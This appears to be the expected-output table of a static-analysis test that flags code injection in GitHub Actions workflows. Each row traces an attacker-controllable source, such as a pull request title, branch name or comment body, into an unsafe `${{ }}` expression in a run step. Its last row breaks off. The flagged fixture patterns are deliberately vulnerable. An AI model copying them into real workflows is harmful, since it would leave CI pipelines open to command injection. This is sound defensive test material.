| .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:29:21:29:57 | 